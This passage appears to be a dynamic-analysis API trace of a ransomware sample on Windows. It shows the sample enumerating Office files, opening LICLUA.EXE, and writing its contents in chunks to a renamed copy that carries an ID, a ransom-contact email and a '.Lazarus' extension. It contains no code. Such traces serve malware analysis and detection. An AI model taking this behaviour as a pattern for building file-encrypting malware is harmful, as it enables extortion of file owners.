ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0101.108] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78710 [0101.109] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.109] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9e7b530, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x58cd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICLUA.EXE", cAlternateFileName="")) returned 1 [0101.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0101.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0101.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0101.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0101.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0101.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0101.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0101.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0101.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0101.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.110] AreFileApisANSI () returned 1 [0101.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE", lpUsedDefaultChar=0x0) returned 67 [0101.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0101.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.110] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0101.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0101.110] AreFileApisANSI () returned 1 [0101.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0101.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82208 [0101.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 67 [0101.110] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.110] GetFileType (hFile=0x368) returned 0x1 [0101.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0101.111] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0101.111] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0101.111] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0101.111] CloseHandle (hObject=0x368) returned 1 [0101.111] AreFileApisANSI () returned 1 [0101.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0101.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82568 [0101.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 67 [0101.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.111] GetFileType (hFile=0x368) returned 0x1 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0101.112] CloseHandle (hObject=0x368) returned 1 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.113] AreFileApisANSI () returned 1 [0101.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82958 [0101.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x82958, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 67 [0101.113] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9e7b530, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x58cd0)) returned 1 [0101.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82958 | out: hHeap=0x20000) returned 1 [0101.113] AreFileApisANSI () returned 1 [0101.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0101.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0101.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0101.114] GetLastError () returned 0x0 [0101.114] SetLastError (dwErrCode=0x0) [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dfc0 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x570e0 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0101.114] GetLastError () returned 0x0 [0101.114] SetLastError (dwErrCode=0x0) [0101.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a9b0 [0101.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0101.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0101.114] AreFileApisANSI () returned 1 [0101.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 129 [0101.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x102) returned 0x8c288 [0101.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x8c288, cchWideChar=129 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 129 [0101.115] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.117] GetFileType (hFile=0x368) returned 0x1 [0101.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0101.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0101.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0101.117] AreFileApisANSI () returned 1 [0101.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0101.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82568 [0101.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 67 [0101.117] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.117] GetFileType (hFile=0x27c) returned 0x1 [0101.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0101.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0101.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0101.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0101.117] GetLastError () returned 0x0 [0101.118] SetLastError (dwErrCode=0x0) [0101.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0101.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0101.118] GetLastError () returned 0x0 [0101.118] SetLastError (dwErrCode=0x0) [0101.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0101.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x986d0 [0101.118] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0101.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0101.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0101.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x996d8 [0101.120] GetLastError () returned 0x0 [0101.120] SetLastError (dwErrCode=0x0) [0101.120] GetLastError () returned 0x0 [0101.121] SetLastError (dwErrCode=0x0) [0101.121] GetLastError () returned 0x0 [0101.121] SetLastError (dwErrCode=0x0) [0101.121] GetLastError () returned 0x0 [0101.121] SetLastError (dwErrCode=0x0) [0101.121] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.122] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.123] GetLastError () returned 0x0 [0101.123] SetLastError (dwErrCode=0x0) [0101.123] GetLastError () returned 0x0 [0101.123] SetLastError (dwErrCode=0x0) [0101.123] GetLastError () returned 0x0 [0101.123] SetLastError (dwErrCode=0x0) [0101.123] GetLastError () returned 0x0 [0101.123] SetLastError (dwErrCode=0x0) [0101.124] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.124] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.124] GetLastError () returned 0x0 [0101.124] SetLastError 